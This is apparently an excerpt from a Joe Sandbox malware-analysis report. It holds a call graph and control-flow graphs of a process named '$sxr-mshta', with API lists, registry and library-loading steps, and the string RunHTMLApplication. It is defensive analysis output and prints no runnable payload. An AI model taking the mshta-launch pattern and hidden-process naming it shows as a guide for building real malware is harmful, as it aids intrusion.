15738->15736 15742 1a00bdbb444 15739->15742 15741 1a00bdbb8e9 15741->15719 15743 1a00bdbb459 try_get_function 15742->15743 15744 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15743->15744 15748 1a00bdbb473 _set_errno_from_matherr 15743->15748 15745 1a00bdbb48e 15744->15745 15746 1a00bdbb900 _set_errno_from_matherr 4 API calls 15745->15746 15745->15748 15747 1a00bdbb4a1 15746->15747 15749 1a00bdbb4bf 15747->15749 15750 1a00bdbb4af 15747->15750 15748->15741 15752 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15749->15752 15751 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15750->15751 15759 1a00bdbb4b6 15751->15759 15753 1a00bdbb4c7 15752->15753 15754 1a00bdbb4cb 15753->15754 15755 1a00bdbb4dd 15753->15755 15757 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15754->15757 15758 1a00bdbb034 _set_errno_from_matherr 4 API calls 15755->15758 15756 1a00bdbb978 __free_lconv_mon 4 API calls 15756->15748 15757->15759 15760 1a00bdbb4e5 15758->15760 15759->15756 15761 1a00bdbb978 __free_lconv_mon 4 API calls 15760->15761 15761->15748 15763 1a00bdbafa8 15762->15763 15766 1a00bdbb21c 15763->15766 15765 1a00bdbafbe 15765->15723 15767 1a00bdbb264 Concurrency::details::SchedulerProxy::DeleteThis 15766->15767 15768 1a00bdbb238 Concurrency::details::SchedulerProxy::DeleteThis 15766->15768 15767->15765 15768->15767 15770 1a00bdbe784 15768->15770 15771 1a00bdbe820 15770->15771 15775 1a00bdbe7a7 15770->15775 15772 1a00bdbe873 15771->15772 15774 1a00bdbb978 __free_lconv_mon 4 API calls 15771->15774 15836 1a00bdbe924 15772->15836 15776 1a00bdbe844 15774->15776 15775->15771 15777 1a00bdbe7e6 15775->15777 15780 1a00bdbb978 __free_lconv_mon 4 API calls 15775->15780 15778 1a00bdbb978 __free_lconv_mon 4 API calls 15776->15778 15779 1a00bdbe808 15777->15779 15786 1a00bdbb978 __free_lconv_mon 4 API calls 15777->15786 15782 1a00bdbe858 15778->15782 15783 1a00bdbb978 __free_lconv_mon 4 API calls 15779->15783 15784 1a00bdbe7da 15780->15784 15781 1a00bdbe87f 15787 1a00bdbe8de 15781->15787 15793 1a00bdbb978 HeapFree LoadLibraryExW LoadLibraryExW GetProcAddress __free_lconv_mon 15781->15793 15785 1a00bdbb978 __free_lconv_mon 4 API calls 15782->15785 15788 1a00bdbe814 15783->15788 15796 1a00bdc0f38 15784->15796 15790 1a00bdbe867 15785->15790 15791 1a00bdbe7fc 15786->15791 15792 1a00bdbb978 __free_lconv_mon 4 API calls 15788->15792 15794 1a00bdbb978 __free_lconv_mon 4 API calls 15790->15794 15824 1a00bdc1044 15791->15824 15792->15771 15793->15781 15794->15772 15797 1a00bdc0f41 15796->15797 15821 1a00bdc103c 15796->15821 15798 1a00bdc0f5b 15797->15798 15799 1a00bdbb978 __free_lconv_mon 4 API calls 15797->15799 15800 1a00bdc0f6d 15798->15800 15801 1a00bdbb978 __free_lconv_mon 4 API calls 15798->15801 15799->15798 15802 1a00bdc0f7f 15800->15802 15803 1a00bdbb978 __free_lconv_mon 4 API calls 15800->15803 15801->15800 15804 1a00bdc0f91 15802->15804 15805 1a00bdbb978 __free_lconv_mon 4 API calls 15802->15805 15803->15802 15806 1a00bdc0fa3 15804->15806 15807 1a00bdbb978 __free_lconv_mon 4 API calls 15804->15807 15805->15804 15808 1a00bdc0fb5 15806->15808 15809 1a00bdbb978 __free_lconv_mon 4 API calls 15806->15809 15807->15806 15810 1a00bdc0fc7 15808->15810 15812 1a00bdbb978 __free_lconv_mon 4 API calls 15808->15812 15809->15808 15811 1a00bdc0fd9 15810->15811 15813 1a00bdbb978 __free_lconv_mon 4 API calls 15810->15813 15814 1a00bdc0feb 15811->15814 15815 1a00bdbb978 __free_lconv_mon 4 API calls 15811->15815 15812->15810 15813->15811 15816 1a00bdbb978 __free_lconv_mon 4 API calls 15814->15816 15817 1a00bdc0ffd 15814->15817 15815->15814 15816->15817 15818 1a00bdc1012 15817->15818 15819 1a00bdbb978 __free_lconv_mon 4 API calls 15817->15819 15820 1a00bdc1027 15818->15820 15822 1a00bdbb978 __free_lconv_mon 4 API calls 15818->15822 15819->15818 15820->15821 15823 1a00bdbb978 __free_lconv_mon 4 API calls 15820->15823 15821->15777 15822->15820 15823->15821 15825 1a00bdc1049 15824->15825 15833 1a00bdc10aa 15824->15833 15826 1a00bdc1062 15825->15826 15827 1a00bdbb978 __free_lconv_mon 4 API calls 15825->15827 15828 1a00bdc1074 15826->15828 15829 1a00bdbb978 __free_lconv_mon 4 API calls 15826->15829 15827->15826 15830 1a00bdbb978 __free_lconv_mon 4 API calls 15828->15830 15832 1a00bdc1086 15828->15832 15829->15828 15830->15832 15831 1a00bdc1098 15831->15833 15835 1a00bdbb978 __free_lconv_mon 4 API calls 15831->15835 15832->15831 15834 1a00bdbb978 __free_lconv_mon 4 API calls 15832->15834 15833->15779 15834->15831 15835->15833 15837 1a00bdbe954 15836->15837 15838 1a00bdbe929 15836->15838 15837->15781 15838->15837 15842 1a00bdc1108 15838->15842 15841 1a00bdbb978 __free_lconv_mon 4 API calls 15841->15837 15843 1a00bdbe94c 15842->15843 15844 1a00bdc1111 15842->15844 15843->15841 15878 1a00bdc10b0 15844->15878 15847 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15848 1a00bdc113a 15847->15848 15849 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15848->15849 15850 1a00bdc1148 15849->15850 15851 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15850->15851 15852 1a00bdc1156 15851->15852 15853 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15852->15853 15854 1a00bdc1165 15853->15854 15855 1a00bdbb978 __free_lconv_mon 4 API calls 15854->15855 15856 1a00bdc1171 15855->15856 15857 1a00bdbb978 __free_lconv_mon 4 API calls 15856->15857 15858 1a00bdc117d 15857->15858 15859 1a00bdbb978 __free_lconv_mon 4 API calls 15858->15859 15860 1a00bdc1189 15859->15860 15861 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15860->15861 15862 1a00bdc1197 15861->15862 15863 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15862->15863 15864 1a00bdc11a5 15863->15864 15865 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15864->15865 15866 1a00bdc11b3 15865->15866 15867 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15866->15867 15868 1a00bdc11c1 15867->15868 15869 1a00bdc10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15868->15869 15870 1a00bdc11d0 15869->15870 15871 1a00bdbb978 __free_lconv_mon 4 API calls 15870->15871 15872 1a00bdc11dc 15871->15872 15873 1a00bdbb978 __free_lconv_mon 4 API calls 15872->15873 15874 1a00bdc11e8 15873->15874 15875 1a00bdbb978 __free_lconv_mon 4 API calls 15874->15875 15876 1a00bdc11f4 15875->15876 15877 1a00bdbb978 __free_lconv_mon 4 API calls 15876->15877 15877->15843 15879 1a00bdc10f8 15878->15879 15880 1a00bdc10e4 15878->15880 15879->15847 15880->15879 15881 1a00bdbb978 __free_lconv_mon 4 API calls 15880->15881 15881->15880 15883 1a00bdbdd20 15882->15883 15890 1a00bdbdd41 15882->15890 15884 1a00bdbb444 _set_errno_from_matherr 4 API calls 15883->15884 15886 1a00bdbdd34 15883->15886 15883->15890 15884->15886 15885 1a00bdbdd7e 15885->15726 15886->15885 15887 1a00bdbddbe 15886->15887 15886->15890 15888 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 15887->15888 15889 1a00bdbddc3 15888->15889 15906 1a00bdbb7c0 15889->15906 15892 1a00bdbdf49 15890->15892 15897 1a00bdbde87 15890->15897 15909 1a00bdbb2c8 15890->15909 15894 1a00bdbb2c8 17 API calls 15894->15897 15895 1a00bdbde77 15896 1a00bdbb2c8 17 API calls 15895->15896 15896->15897 15897->15894 15899 1a00bdbb5e6 _invalid_parameter_noinfo 15898->15899 15900 1a00bdbb60e RtlCaptureContext RtlLookupFunctionEntry 15899->15900 15901 1a00bdbb648 RtlVirtualUnwind 15900->15901 15902 1a00bdbb67e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15900->15902 15901->15902 15905 1a00bdbb6d0 _invalid_parameter_noinfo 15902->15905 15904 1a00bdbb6ef 15904->15730 15966 1a00bdb7ac0 15905->15966 15953 1a00bdbb710 15906->15953 15908 1a00bdbb7d9 15908->15885 15911 1a00bdbb2dd try_get_function 15909->15911 15910 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15912 1a00bdbb312 15910->15912 15911->15910 15917 1a00bdbb2f7 _set_errno_from_matherr 15911->15917 15913 1a00bdbb900 _set_errno_from_matherr 4 API calls 15912->15913 15912->15917 15914 1a00bdbb325 15913->15914 15915 1a00bdbb343 15914->15915 15916 1a00bdbb333 15914->15916 15920 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15915->15920 15918 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15916->15918 15919 1a00bdbb386 15917->15919 15922 1a00bdbac34 17 API calls 15917->15922 15921 1a00bdbb33a 15918->15921 15919->15895 15923 1a00bdbb34b 15920->15923 15928 1a00bdbb978 __free_lconv_mon 4 API calls 15921->15928 15930 1a00bdbb39b 15922->15930 15924 1a00bdbb34f 15923->15924 15925 1a00bdbb361 15923->15925 15926 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15924->15926 15927 1a00bdbb034 _set_errno_from_matherr 4 API calls 15925->15927 15926->15921 15929 1a00bdbb369 15927->15929 15928->15917 15931 1a00bdbb978 __free_lconv_mon 4 API calls 15929->15931 15932 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15930->15932 15934 1a00bdbb3ba 15930->15934 15931->15917 15933 1a00bdbb3d1 15932->15933 15933->15934 15936 1a00bdbb900 _set_errno_from_matherr 4 API calls 15933->15936 15935 1a00bdbac34 17 API calls 15934->15935 15939 1a00bdbb434 15934->15939 15937 1a00bdbb442 15935->15937 15938 1a00bdbb3e4 15936->15938 15940 1a00bdbb402 15938->15940 15941 1a00bdbb3f2 15938->15941 15939->15895 15942 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15940->15942 15943 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15941->15943 15944 1a00bdbb40a 15942->15944 15945 1a00bdbb3f9 15943->15945 15946 1a00bdbb40e 15944->15946 15947 1a00bdbb420 15944->15947 15950 1a00bdbb978 __free_lconv_mon 4 API calls 15945->15950 15949 1a00bdbd6a8 _set_errno_from_matherr 3 API calls 15946->15949 15948 1a00bdbb034 _set_errno_from_matherr 4 API calls 15947->15948 15951 1a00bdbb428 15948->15951 15949->15945 15950->15934 15951->15934 15952 1a00bdbb978 __free_lconv_mon 4 API calls 15951->15952 15952->15934 15954 1a00bdbb444 _set_errno_from_matherr 4 API calls 15953->15954 15955 1a00bdbb735 15954->15955 15958 1a00bdbb746 15955->15958 15961 1a00bdbb7e0 IsProcessorFeaturePresent 15955->15961 15958->15908 15962 1a00bdbb7f3 15961->15962 15963 1a00bdbb5ac _invalid_parameter_noinfo 10 API calls 15962->15963 15964 1a00bdbb80e _invalid_parameter_noinfo 15963->15964 15965 1a00bdbb814 TerminateProcess 15964->15965 15967 1a00bdb7ac9 15966->15967 15968 1a00bdb82ac IsProcessorFeaturePresent 15967->15968 15969 1a00bdb7ad4 15967->15969 15970 1a00bdb82c4 15968->15970 15969->15904 15973 1a00bdb84a0 RtlCaptureContext 15970->15973 15972 1a00bdb82d7 15972->15904 15974 1a00bdb84ba RtlLookupFunctionEntry 15973->15974 15975 1a00bdb8509 15974->15975 15976 1a00bdb84d0 RtlVirtualUnwind 15974->15976 15975->15972 15976->15974 15976->15975 15982 1a00bdbcc43 15977->15982 15978 1a00bdbccbf 15978->15697 15979 1a00bdbcc4d 15979->15978 15980 1a00bdbac34 17 API calls 15979->15980 15981 1a00bdbccd7 15980->15981 15984 1a00bdbb39c 17 API calls 15981->15984 15987 1a00bdbcd2a 15981->15987 15982->15979 15983 1a00bdbb978 __free_lconv_mon 4 API calls 15982->15983 15983->15979 15985 1a00bdbcd14 15984->15985 15986 1a00bdbca60 25 API calls 15985->15986 15986->15987 15987->15697 16022 1a00bdbac8c 15988->16022 15991 1a00bdbc79e 15993 1a00bdbc7a3 GetACP 15991->15993 15994 1a00bdbc7b3 15991->15994 15992 1a00bdbc78c GetOEMCP 15992->15994 15993->15994 15994->15704 15995 1a00bdbaeac 15994->15995 15998 1a00bdbaebb _set_errno_from_matherr 15995->15998 15996 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 15997 1a00bdbaef5 15996->15997 15997->15701 15999 1a00bdbcd54 15997->15999 15998->15996 15998->15997 16000 1a00bdbc76c 19 API calls 15999->16000 16001 1a00bdbcd7f 16000->16001 16002 1a00bdbcdbc IsValidCodePage 16001->16002 16008 1a00bdbcdff _invalid_parameter_noinfo 16001->16008 16004 1a00bdbcdcd 16002->16004 16002->16008 16003 1a00bdb7ac0 _handle_error 4 API calls 16005 1a00bdbcb43 16003->16005 16006 1a00bdbce04 GetCPInfo 16004->16006 16009 1a00bdbcdd6 _invalid_parameter_noinfo 16004->16009 16005->15707 16005->15710 16006->16008 16006->16009 16008->16003 16053 1a00bdbc87c 16009->16053 16012 1a00bdbc5cc _invalid_parameter_noinfo 16010->16012 16011 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 16013 1a00bdbc65e 16011->16013 16012->16011 16015 1a00bdbc5ef _invalid_parameter_noinfo 16012->16015 16014 1a00bdbb7c0 _invalid_parameter_noinfo 16 API calls 16013->16014 16014->16015 16016 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 16015->16016 16020 1a00bdbc697 16015->16020 16017 1a00bdbc6f5 16016->16017 16018 1a00bdbb7c0 _invalid_parameter_noinfo 16 API calls 16017->16018 16018->16020 16019 1a00bdbc731 16019->15701 16020->16019 16021 1a00bdbb978 __free_lconv_mon 4 API calls 16020->16021 16021->16019 16023 1a00bdbacb0 16022->16023 16029 1a00bdbacab 16022->16029 16024 1a00bdbb2c8 17 API calls 16023->16024 16023->16029 16025 1a00bdbaccb 16024->16025 16030 1a00bdbe584 16025->16030 16029->15991 16029->15992 16031 1a00bdbacee 16030->16031 16032 1a00bdbe599 16030->16032 16034 1a00bdbe5b8 16031->16034 16032->16031 16038 1a00bdbea2c 16032->16038 16035 1a00bdbe5cd 16034->16035 16036 1a00bdbe5e0 16034->16036 16035->16036 16050 1a00bdbcd38 16035->16050 16036->16029 16039 1a00bdbb2c8 17 API calls 16038->16039 16041 1a00bdbea3b 16039->16041 16040 1a00bdbea86 16040->16031 16041->16040 16046 1a00bdbea9c 16041->16046 16043 1a00bdbea74 16043->16040 16044 1a00bdbac34 17 API calls 16043->16044 16045 1a00bdbea99 16044->16045 16047 1a00bdbeabb 16046->16047 16048 1a00bdbeaae Concurrency::details::SchedulerProxy::DeleteThis 16046->16048 16047->16043 16048->16047 16049 1a00bdbe784 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16048->16049 16049->16047 16051 1a00bdbb2c8 17 API calls 16050->16051 16052 1a00bdbcd41 16051->16052 16054 1a00bdbc8b9 GetCPInfo 16053->16054 16055 1a00bdbc9af 16053->16055 16054->16055 16056 1a00bdbc8cc 16054->16056 16057 1a00bdb7ac0 _handle_error 4 API calls 16055->16057 16064 1a00bdbf494 16056->16064 16059 1a00bdbca48 16057->16059 16059->16008 16063 1a00bdbf93c 19 API calls 16063->16055 16065 1a00bdbac8c 17 API calls 16064->16065 16067 1a00bdbf4d6 16065->16067 16066 1a00bdbf513 16069 1a00bdb7ac0 _handle_error 4 API calls 16066->16069 16067->16066 16068 1a00bdbaeac 4 API calls 16067->16068 16073 1a00bdbf538 _invalid_parameter_noinfo 16067->16073 16068->16073 16070 1a00bdbc943 16069->16070 16075 1a00bdbf93c 16070->16075 16071 1a00bdbf5d0 16071->16066 16072 1a00bdbb978 __free_lconv_mon 4 API calls 16071->16072 16072->16066 16073->16071 16074 1a00bdbf5b6 GetStringTypeW 16073->16074 16074->16071 16076 1a00bdbac8c 17 API calls 16075->16076 16077 1a00bdbf961 16076->16077 16080 1a00bdbf624 16077->16080 16084 1a00bdbf666 16080->16084 16081 1a00bdbf8ef 16082 1a00bdb7ac0 _handle_error 4 API calls 16081->16082 16083 1a00bdbc976 16082->16083 16083->16063 16084->16081 16085 1a00bdbaeac 4 API calls 16084->16085 16086 1a00bdbf6e3 16084->16086 16085->16086 16087 1a00bdbf7e7 16086->16087 16104 1a00bdbd760 16086->16104 16087->16081 16089 1a00bdbb978 __free_lconv_mon 4 API calls 16087->16089 16089->16081 16090 1a00bdbf78f 16090->16087 16091 1a00bdbf7a4 16090->16091 16092 1a00bdbf7f6 16090->16092 16091->16087 16094 1a00bdbd760 4 API calls 16091->16094 16093 1a00bdbaeac 4 API calls 16092->16093 16096 1a00bdbf810 16092->16096 16093->16096 16094->16087 16095 1a00bdbd760 4 API calls 16098 1a00bdbf891 16095->16098 16096->16087 16096->16095 16097 1a00bdbf8c6 16097->16087 16099 1a00bdbb978 __free_lconv_mon 4 API calls 16097->16099 16098->16097 16110 1a00bdbd120 16098->16110 16099->16087 16105 1a00bdbd36c try_get_function 3 API calls 16104->16105 16106 1a00bdbd79e 16105->16106 16109 1a00bdbd7a3 16106->16109 16114 1a00bdbd83c 16106->16114 16108 1a00bdbd7ff LCMapStringW 16108->16109 16109->16090 16112 1a00bdbd143 WideCharToMultiByte 16110->16112 16113 1a00bdc30b0 16112->16113 16115 1a00bdbd36c try_get_function 3 API calls 16114->16115 16116 1a00bdbd86a 16115->16116 16116->16108 16118 1a00bdbabeb 16117->16118 16119 1a00bdbabe1 16117->16119 16120 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 16118->16120 16119->16118 16124 1a00bdbac06 16119->16124 16121 1a00bdbabf2 16120->16121 16122 1a00bdbb7c0 _invalid_parameter_noinfo 16 API calls 16121->16122 16123 1a00bdbabfe 16122->16123 16123->15661 16124->16123 16125 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 16124->16125 16125->16121 16127 1a00bdba738 16126->16127 16128 1a00bdba781 16126->16128 16127->15663 16129 1a00bdba7aa 16128->16129 16130 1a00bdbb978 __free_lconv_mon 4 API calls 16128->16130 16131 1a00bdbb978 __free_lconv_mon 4 API calls 16129->16131 16130->16128 16131->16127 16132 7ff7142f1500 16151 7ff7142f19d4 16132->16151 16136 7ff7142f154b 16137 7ff7142f155d 16136->16137 16138 7ff7142f1577 Sleep 16136->16138 16139 7ff7142f156d _amsg_exit 16137->16139 16144 7ff7142f1584 16137->16144 16138->16136 16139->16144 16140 7ff7142f15fc _initterm 16142 7ff7142f1619 _IsNonwritableInCurrentImage 16140->16142 16141 7ff7142f15dd 16142->16141 16143 7ff7142f16f8 _ismbblead 16142->16143 16145 7ff7142f167d 16142->16145 16143->16142 16144->16140 16144->16141 16144->16142 16155 7ff7142f1008 GetVersion 16145->16155 16148 7ff7142f16cf 16148->16141 16150 7ff7142f16d8 _cexit 16148->16150 16149 7ff7142f16c7 exit 16149->16148 16150->16141 16152 7ff7142f1509 GetStartupInfoW 16151->16152 16153 7ff7142f1a00 6 API calls 16151->16153 16152->16136 16154 7ff7142f1a7f 16153->16154 16154->16152 16156 7ff7142f1046 16155->16156 16157 7ff7142f108f 16155->16157 16156->16157 16158 7ff7142f104a GetModuleHandleW 16156->16158 16191 7ff7142f1378 16157->16191 16158->16157 16161 7ff7142f1062 GetProcAddress 16158->16161 16161->16157 16163 7ff7142f107d 16161->16163 16162 7ff7142f1378 malloc 16164 7ff7142f10b0 16162->16164 16163->16157 16165 7ff7142f10c8 LoadLibraryW 16164->16165 16167 7ff7142f1323 16164->16167 16166 7ff7142f10e7 GetProcAddress 16165->16166 16165->16167 16170 7ff7142f113f FreeLibrary 16166->16170 16172 7ff7142f1102 16166->16172 16168 7ff7142f1356 16167->16168 16169 7ff7142f134a RegCloseKey 16167->16169 16168->16148 16168->16149 16169->16168 16170->16167 16171 7ff7142f1157 RegOpenKeyExA 16170->16171 16171->16167 16173 7ff7142f118d RegQueryValueExA 16171->16173 16172->16170 16173->16167 16174 7ff7142f11bc 16173->16174 16175 7ff7142f11c4 ExpandEnvironmentStringsA 16174->16175 16176 7ff7142f11e7 LoadLibraryA 16174->16176 16175->16167 16177 7ff7142f11e4 16175->16177 16178 7ff7142f1208 16176->16178 16177->16176 16179 7ff7142f1231 GetModuleHandleW 16178->16179 16180 7ff7142f1220 RegCloseKey 16178->16180 16181 7ff7142f124d GetProcAddress 16179->16181 16190 7ff7142f12d1 16179->16190 16180->16179 16183 7ff7142f126b 16181->16183 16181->16190 16182 7ff7142f12e6 GetProcAddress 16184 7ff7142f1314 FreeLibrary 16182->16184 16185 7ff7142f1301 16182->16185 16186 7ff7142f1378 malloc 16183->16186 16184->16167 16185->16184 16187 7ff7142f1296 16186->16187 16188 7ff7142f129e MultiByteToWideChar 16187->16188 16187->16190 16189 7ff7142f12c3 UnregisterApplicationRestart 16188->16189 16188->16190 16189->16190 16190->16167 16190->16182 16192 7ff7142f1396 malloc 16191->16192 16193 7ff7142f10a6 16192->16193 16194 7ff7142f1387 16192->16194 16193->16162 16194->16192 16194->16193 16195 1a00bdbb900 16196 1a00bdbb911 _set_errno_from_matherr 16195->16196 16197 1a00bdbb8e0 _set_errno_from_matherr 4 API calls 16196->16197 16198 1a00bdbb960 16196->16198 16197->16198 16199 1a00aad29a0 16200 1a00aad29ce 16199->16200 16201 1a00aad2a2c VirtualAlloc 16200->16201 16202 1a00aad2a50 16200->16202 16201->16202

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 7ff7142f1008-7ff7142f1044 GetVersion 1 7ff7142f1046-7ff7142f1048 0->1 2 7ff7142f108f-7ff7142f10b9 call 7ff7142f1378 * 2 0->2 1->2 3 7ff7142f104a-7ff7142f1060 GetModuleHandleW 1->3 10 7ff7142f10bf-7ff7142f10c2 2->10 11 7ff7142f1330-7ff7142f1333 2->11 3->2 6 7ff7142f1062-7ff7142f107b GetProcAddress 3->6 6->2 8 7ff7142f107d-7ff7142f1085 6->8 8->2 12 7ff7142f1323-7ff7142f1326 10->12 13 7ff7142f10c8-7ff7142f10e1 LoadLibraryW 10->13 14 7ff7142f1335-7ff7142f1338 call 7ff7142f13b8 11->14 15 7ff7142f133d-7ff7142f1348 11->15 12->11 17 7ff7142f1328-7ff7142f132b call 7ff7142f13b8 12->17 13->12 16 7ff7142f10e7-7ff7142f1100 GetProcAddress 13->16 14->15 19 7ff7142f1356-7ff7142f136f 15->19 20 7ff7142f134a-7ff7142f1351 RegCloseKey 15->20 21 7ff7142f1102-7ff7142f111b 16->21 22 7ff7142f113f-7ff7142f1151 FreeLibrary 16->22 17->11 20->19 25 7ff7142f1125-7ff7142f1129 21->25 22->12 24 7ff7142f1157-7ff7142f1187 RegOpenKeyExA 22->24 24->12 26 7ff7142f118d-7ff7142f11b6 RegQueryValueExA 24->26 25->22 27 7ff7142f112b-7ff7142f113c 25->27 26->12 28 7ff7142f11bc-7ff7142f11c2 26->28 27->22 29 7ff7142f11c4-7ff7142f11de ExpandEnvironmentStringsA 28->29 30 7ff7142f11e7-7ff7142f121e LoadLibraryA call 7ff7142f13b8 * 2 28->30 29->12 32 7ff7142f11e4 29->32 36 7ff7142f1231-7ff7142f1247 GetModuleHandleW 30->36 37 7ff7142f1220-7ff7142f122c RegCloseKey 30->37 32->30 38 7ff7142f12e1-7ff7142f12e4 36->38 39 7ff7142f124d-7ff7142f1269 GetProcAddress 36->39 37->36 38->15 40 7ff7142f12e6-7ff7142f12ff GetProcAddress 38->40 41 7ff7142f12dd 39->41 42 7ff7142f126b-7ff7142f126f 39->42 43 7ff7142f1314-7ff7142f131e FreeLibrary 40->43 44 7ff7142f1301-7ff7142f130b 40->44 41->38 45 7ff7142f1272-7ff7142f1279 42->45 43->12 44->43 45->45 46 7ff7142f127b-7ff7142f129c call 7ff7142f1378 45->46 49 7ff7142f129e-7ff7142f12c1 MultiByteToWideChar 46->49 50 7ff7142f12d9 46->50 51 7ff7142f12c3-7ff7142f12cb UnregisterApplicationRestart 49->51 52 7ff7142f12d1-7ff7142f12d4 call 7ff7142f13b8 49->52 50->41 51->52 52->50
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryProc$CloseFreeHandleLoadModule$ApplicationByteCharEnvironmentExpandMultiOpenQueryRestartStringsUnregisterValueVersionWide
                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$WLDP.DLL$WldpGetLockdownPolicy$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
                                                                                                                      • API String ID: 964684844-3560873152
                                                                                                                      • Opcode ID: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
                                                                                                                      • Instruction ID: 7f3ef331644e1ce6af3de4bf0dc47f088633cd53e799c333f96ada96eca2d294
                                                                                                                      • Opcode Fuzzy Hash: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
                                                                                                                      • Instruction Fuzzy Hash: 92915231A04F5286EB14AF52A880179E6E1BF4BBB4BD44235DE6E437D5DF3ED4888720
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 54 7ff7142f1500-7ff7142f1549 call 7ff7142f19d4 GetStartupInfoW 58 7ff7142f154b-7ff7142f1556 54->58 59 7ff7142f1562-7ff7142f156b 58->59 60 7ff7142f1558-7ff7142f155b 58->60 63 7ff7142f1584-7ff7142f158c 59->63 64 7ff7142f156d-7ff7142f1575 _amsg_exit 59->64 61 7ff7142f155d 60->61 62 7ff7142f1577-7ff7142f1582 Sleep 60->62 61->59 62->58 66 7ff7142f158e-7ff7142f15ab 63->66 67 7ff7142f15e7 63->67 65 7ff7142f15f1-7ff7142f15fa 64->65 69 7ff7142f15fc-7ff7142f160f _initterm 65->69 70 7ff7142f1619-7ff7142f161b 65->70 68 7ff7142f15af-7ff7142f15b2 66->68 67->65 73 7ff7142f15b4-7ff7142f15b6 68->73 74 7ff7142f15d9-7ff7142f15db 68->74 69->70 71 7ff7142f1626-7ff7142f162e 70->71 72 7ff7142f161d-7ff7142f161f 70->72 75 7ff7142f1630-7ff7142f163e call 7ff7142f1940 71->75 76 7ff7142f165a-7ff7142f1669 71->76 72->71 77 7ff7142f15dd-7ff7142f15e2 73->77 78 7ff7142f15b8-7ff7142f15bc 73->78 74->65 74->77 75->76 87 7ff7142f1640-7ff7142f1650 75->87 82 7ff7142f166d-7ff7142f1673 76->82 83 7ff7142f1744-7ff7142f1759 77->83 80 7ff7142f15ce-7ff7142f15d7 78->80 81 7ff7142f15be-7ff7142f15ca 78->81 80->68 81->80 85 7ff7142f1675-7ff7142f1677 82->85 86 7ff7142f16e6-7ff7142f16e9 82->86 91 7ff7142f167d-7ff7142f1682 85->91 92 7ff7142f1679-7ff7142f167b 85->92 88 7ff7142f16eb-7ff7142f16f4 86->88 89 7ff7142f16f8-7ff7142f1700 _ismbblead 86->89 87->76 88->89 93 7ff7142f1702-7ff7142f1705 89->93 94 7ff7142f170a-7ff7142f1712 89->94 95 7ff7142f1684-7ff7142f168e 91->95 96 7ff7142f1690-7ff7142f16b3 call 7ff7142f1008 91->96 92->86 92->91 93->94 94->82 94->83 95->91 98 7ff7142f16b8-7ff7142f16c5 96->98 99 7ff7142f16cf-7ff7142f16d6 98->99 100 7ff7142f16c7-7ff7142f16c9 exit 98->100 101 7ff7142f16e4 99->101 102 7ff7142f16d8-7ff7142f16de _cexit 99->102 100->99 101->83 102->101
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
